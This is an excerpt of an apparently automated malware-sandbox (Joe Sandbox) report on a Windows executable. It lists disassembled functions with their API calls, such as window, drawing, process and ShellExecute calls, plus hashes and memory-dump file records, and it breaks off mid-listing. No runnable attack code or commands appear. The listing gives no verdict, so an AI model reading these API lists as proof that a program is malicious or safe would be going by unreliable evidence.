                                                                                                                                                                                                                                                                            • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                            • Opcode ID: 38967f2690621ebb1a54fad38aa83dfbfd2a44ce03fb9b282dafa03e4bc2c1ba
                                                                                                                                                                                                                                                                            • Instruction ID: df069347bb6911ec9e1111d66a245d83d388a688c97cb309cec69606ce3a6aa0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38967f2690621ebb1a54fad38aa83dfbfd2a44ce03fb9b282dafa03e4bc2c1ba
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66D15571A043059FC724DF24C484A2ABBE5FF89714F1489ACF9969B361CB31ED49CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C88740
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00C88765
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C8877D
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00C887A6
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C6C1F2,00000000), ref: 00C887C6
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00C887B1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                            • Opcode ID: 22e0751a7928825e2de6e9da64e9f221f44daad58b3d3e933d85f5db49b01684
                                                                                                                                                                                                                                                                            • Instruction ID: 7219164248e17822f85842bd0c43ac1018c418dbe4cdd1dbda2e9b55ee685637
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22e0751a7928825e2de6e9da64e9f221f44daad58b3d3e933d85f5db49b01684
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4219071610245AFCB14AF39CC48B6E37B6EB44329F654A29F937C29E0EF308954CB18
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00C136E9,00C13355), ref: 00C13700
                                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C1370E
                                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C13727
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00C136E9,00C13355), ref: 00C13779
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                            • Opcode ID: fa812e400d2c0a7ed281711e4ebe405d934fda5d41fa6b84722392f1f72cedcf
                                                                                                                                                                                                                                                                            • Instruction ID: 22f1d087bbc06c0fe718b81916d937234484dfbfb134c0e3afe1ffb8b05c15a6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa812e400d2c0a7ed281711e4ebe405d934fda5d41fa6b84722392f1f72cedcf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5601D8B66193516EA6243BB5BDCA7EA3B94EB17779B200339F122450F0FF514E827284
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00C14D53,00000000,?,?,00C168E2,?,?,00000000), ref: 00C230EB
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2311E
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23146
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00C23153
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00C2315F
                                                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 00C23165
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                            • Opcode ID: bccc1c30b8036bc96ae86d1d852d7289104e65c4b206eabec2cd53c0bdfd91ab
                                                                                                                                                                                                                                                                            • Instruction ID: 90fee962fa2008276e37332169853a4258d2ffbb1ccb8254fd58c02a2e742c84
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bccc1c30b8036bc96ae86d1d852d7289104e65c4b206eabec2cd53c0bdfd91ab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAF0A43694457036C2123779BC06B5E177A9FC1771F250534F92592AE1EE288A12A661
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF1F87
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: SelectObject.GDI32(?,00000000), ref: 00BF1F96
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: BeginPath.GDI32(?), ref: 00BF1FAD
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1F2D: SelectObject.GDI32(?,00000000), ref: 00BF1FD6
                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C894AA
                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 00C894BE
                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C894CC
                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 00C894DC
                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 00C894EC
                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 00C894FC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 43455801-0
                                                                                                                                                                                                                                                                            • Opcode ID: 81995429e6abbaeba5ef317fc19b316033b14b0945855ccefddb6768051881b3
                                                                                                                                                                                                                                                                            • Instruction ID: e144d15318672609e9670be5891e2f340fd41d5ac3ee283006254a5983bad06e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81995429e6abbaeba5ef317fc19b316033b14b0945855ccefddb6768051881b3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5011097200010DBFDB02AF90DC88FAE7F6DEB08364F048011FA1A4A1A1C7719E559BA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C55B7C
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C55B8D
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C55B94
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C55B9C
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C55BB3
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C55BC5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                            • Opcode ID: 299f08ab16fe72b204f2dd1b2ff1011f134e85a9c0901bd4fe370f46ae787142
                                                                                                                                                                                                                                                                            • Instruction ID: 3018a3b5dffa67dbf7f7c925a5d3b2780fe20c0ac578bc7f3d7925c720efc048
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 299f08ab16fe72b204f2dd1b2ff1011f134e85a9c0901bd4fe370f46ae787142
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56014F75A00719BBEB109FA59C49F4EBFB8EF48762F104065FA09E7280D6709D04CBA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF32AF
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF32B7
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF32C2
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF32CD
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF32D5
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF32DD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                            • Opcode ID: d91c7c905903a630b23b518f7207198dc9e06b6102f42c3f2f3e886ce2d18c4e
                                                                                                                                                                                                                                                                            • Instruction ID: fddea36d66160ab13fc30d04e52f0a925dae2abd84556181e34dcb6ebab4707a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d91c7c905903a630b23b518f7207198dc9e06b6102f42c3f2f3e886ce2d18c4e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91016CB09017597DE3008F5A8C85B56FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C5F447
                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C5F45D
                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00C5F46C
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5F47B
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5F485
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5F48C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 839392675-0
                                                                                                                                                                                                                                                                            • Opcode ID: dd83cba57bae019d991d23bda639f453c4eb1cbb8cbc3582258c30be40a7e381
                                                                                                                                                                                                                                                                            • Instruction ID: 04071b8ad5b9a5666e8d28c46c644f7fe6ad7d0ea961b19f1b2b1f50e61a58d1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd83cba57bae019d991d23bda639f453c4eb1cbb8cbc3582258c30be40a7e381
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EF03032241158BBE7215752AC0EFEF3B7CEFC6B21F000058F612910D0E7A06A41D7B9
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?), ref: 00C334EF
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00C33506
                                                                                                                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 00C33512
                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00C33521
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00C33533
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000005), ref: 00C3354D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 272304278-0
                                                                                                                                                                                                                                                                            • Opcode ID: c3993455e908ae94cbbe21c84bd3fc50e8526d78850eb9dc53e02a843197edf8
                                                                                                                                                                                                                                                                            • Instruction ID: 5d445cf74379091ce43a97098f2e20b8e740cd7e654ca92a4af0a6c52cfb8ca8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3993455e908ae94cbbe21c84bd3fc50e8526d78850eb9dc53e02a843197edf8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2012431500209EFEB506FA4DC08FEE7BB6FF08321F510561FA2AA21E0CB321E51AB14
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C521CC
                                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00C521D8
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C521E1
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C521E9
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C521F2
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C521F9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8dbfbb89ee219169adfed8c0495de2919499ea496147b98c33203aad05b32910
                                                                                                                                                                                                                                                                            • Instruction ID: b5a1d2bf75aaf6a343f5e6cb986ec564f214fc307b216533ac470a9daf927839
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dbfbb89ee219169adfed8c0495de2919499ea496147b98c33203aad05b32910
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2E07576104505BBDB012FA5EC0DF4EBF79FF49732B504625F226824B4CB329861EB59
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF41EA: _wcslen.LIBCMT ref: 00BF41EF
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C5CF99
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5CFE0
                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C5D047
                                                                                                                                                                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C5D075
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: 031eebc26027cff54c55115a8ec82664c2d03897bacb7e9bb97015007a62df93
                                                                                                                                                                                                                                                                            • Instruction ID: 99c8ae077c5b8be87b31aec2ba1b0e8abac4d3e4aff8c6383d867439868ad111
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 031eebc26027cff54c55115a8ec82664c2d03897bacb7e9bb97015007a62df93
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E51C1756043009FD724AE64C885B6FB7E8EB85316F040A2DFDA6D31D0DBB0CAC9975A
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00C7B903
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF41EA: _wcslen.LIBCMT ref: 00BF41EF
                                                                                                                                                                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 00C7B998
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7B9C7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                                                                                            • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                            • Opcode ID: 89b9cddd47038f2b947093dc02b90a69558b5cb8c0594dfb1c05802acdd8209b
                                                                                                                                                                                                                                                                            • Instruction ID: b5ed2b76269d0b3e8c6361d3cb4af68c9be5ba494f072ba4eb42dd3296c9f0fe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89b9cddd47038f2b947093dc02b90a69558b5cb8c0594dfb1c05802acdd8209b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0714A75A00219DFCB14DF54C494AAEBBF5FF08310F048499E96AAB391CB74EE45CB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C57B6D
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C57BA3
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C57BB4
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C57C36
                                                                                                                                                                                                                                                                            Strings
